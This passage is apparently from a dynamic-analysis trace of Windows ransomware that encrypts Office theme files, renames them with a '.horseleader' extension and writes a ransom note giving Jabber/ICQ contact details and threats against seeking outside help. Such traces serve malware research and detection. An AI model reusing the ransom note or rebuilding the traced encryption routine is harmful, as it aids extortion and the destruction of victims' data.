ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x9240, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, 
cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0247.464] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0247.464] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 80 [0247.464] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0247.464] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0247.464] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0247.464] lstrlenW (lpString=".testttjffg") returned 11 [0247.464] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0247.464] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.464] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.464] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.465] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG") returned 80 [0247.465] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0247.465] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=37440) returned 1 [0247.465] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, 
lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.471] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.471] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.472] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x4240, lpOverlapped=0x0) returned 1 [0247.472] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffbdc0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.472] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x4240, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x4240, lpOverlapped=0x0) returned 1 [0247.473] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.473] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.473] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.473] CloseHandle (hObject=0x1a4) returned 1 [0247.473] GetProcessHeap () returned 0x780000 [0247.473] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.473] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.horseleader") returned 92 [0247.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\thmbnail.png.horseleader")) returned 1 [0247.474] GetProcessHeap () returned 0x780000 [0247.474] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.474] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x9240, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0247.475] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0247.475] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\#Decrypt#.txt") returned 81 [0247.475] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PAPYRUS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\papyrus\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0247.479] lstrlenA (lpString="All your files have 
been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0247.479] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0247.480] lstrlenA (lpString="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") returned 1368 [0247.480] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0247.480] CloseHandle (hObject=0x158) returned 1 [0247.481] GetProcessHeap () returned 0x780000 [0247.481] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0247.481] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a44b570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="PIXEL", cAlternateFileName="")) returned 1 [0247.481] lstrcmpiW (lpString1="PIXEL", lpString2="Windows") returned -1 [0247.481] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL") returned 65 [0247.481] lstrcmpW (lpString1="PIXEL", lpString2=".") returned 1 [0247.481] lstrcmpW (lpString1="PIXEL", lpString2="..") returned 1 [0247.481] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0247.481] GetProcessHeap () returned 0x780000 [0247.481] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7dbfd8 [0247.481] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\*") returned 67 [0247.481] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a44b570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0247.482] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0247.482] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\.") returned 67 [0247.482] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0247.482] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a44b570, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d05ead0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0247.482] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0247.482] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\..") returned 68 [0247.482] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0247.483] lstrcmpW 
(lpString1="..", lpString2="..") returned 0 [0247.483] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17a2e300, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x6cf07e70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17a2e300, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xd0e5, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PIXEL.ELM", cAlternateFileName="")) returned 1 [0247.483] lstrcmpiW (lpString1="PIXEL.ELM", lpString2="Windows") returned -1 [0247.483] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM") returned 75 [0247.483] StrStrIW (lpFirst="PIXEL.ELM", lpSrch=".horseleader") returned 0x0 [0247.483] lstrcmpW (lpString1="PIXEL.ELM", lpString2="#Decrypt#.txt") returned 1 [0247.483] lstrcmpW (lpString1="PIXEL.ELM", lpString2="_uninstalling_.png") returned 1 [0247.483] lstrlenW (lpString=".testttjffg") returned 11 [0247.483] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM", lpSrch=".testttjffg") returned 0x0 [0247.483] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.483] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.483] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 
[0247.484] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM") returned 75 [0247.484] StrStrW (lpFirst="PIXEL.ELM", lpSrch=".txt") returned 0x0 [0247.484] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=53477) returned 1 [0247.484] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.487] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.488] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.488] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.489] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.489] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0247.490] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x30e5, lpOverlapped=0x0) returned 1 [0247.490] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffcf1b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.490] 
WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x30e5, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x30e5, lpOverlapped=0x0) returned 1 [0247.490] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.490] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.491] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.491] CloseHandle (hObject=0x1a4) returned 1 [0247.491] GetProcessHeap () returned 0x780000 [0247.491] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.491] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM.horseleader") returned 87 [0247.491] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.elm.horseleader")) returned 1 [0247.492] GetProcessHeap () returned 0x780000 [0247.492] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.492] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5a44b570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x21b, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PIXEL.INF", cAlternateFileName="")) returned 1 [0247.493] lstrcmpiW (lpString1="PIXEL.INF", lpString2="Windows") returned -1 [0247.493] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF") returned 75 [0247.493] StrStrIW (lpFirst="PIXEL.INF", lpSrch=".horseleader") returned 0x0 [0247.493] lstrcmpW (lpString1="PIXEL.INF", lpString2="#Decrypt#.txt") returned 1 [0247.493] lstrcmpW (lpString1="PIXEL.INF", lpString2="_uninstalling_.png") returned 1 [0247.493] lstrlenW (lpString=".testttjffg") returned 11 [0247.493] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF", lpSrch=".testttjffg") returned 0x0 [0247.493] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.493] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.493] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.494] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF") returned 75 [0247.494] StrStrW (lpFirst="PIXEL.INF", 
lpSrch=".txt") returned 0x0 [0247.494] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=539) returned 1 [0247.494] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x21b, lpOverlapped=0x0) returned 1 [0247.496] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffde5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.496] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x21b, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x21b, lpOverlapped=0x0) returned 1 [0247.496] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0247.497] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0247.497] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0247.497] CloseHandle (hObject=0x1a4) returned 1 [0247.497] GetProcessHeap () returned 0x780000 [0247.497] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0247.497] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF.horseleader") returned 87 [0247.497] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.inf"), 
lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PIXEL.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\pixel.inf.horseleader")) returned 1 [0247.501] GetProcessHeap () returned 0x780000 [0247.501] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0247.502] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6d05ead0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x639, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="PREVIEW.GIF", cAlternateFileName="")) returned 1 [0247.502] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0247.502] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 77 [0247.502] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".horseleader") returned 0x0 [0247.502] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="#Decrypt#.txt") returned 1 [0247.502] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0247.502] lstrlenW (lpString=".testttjffg") returned 11 [0247.502] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0247.502] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0247.502] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0247.502] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\pixel\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0247.503] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\PIXEL\\PREVIEW.GIF") returned 77 [0247.503] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0247.503] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1593) returned 1 [0247.503] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x639, lpOverlapped=0x0) returned 1 [0247.506] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffff9c7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0247.506] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x639, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x639, lpOverlapped=0x0) returned 1 [0247.506] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 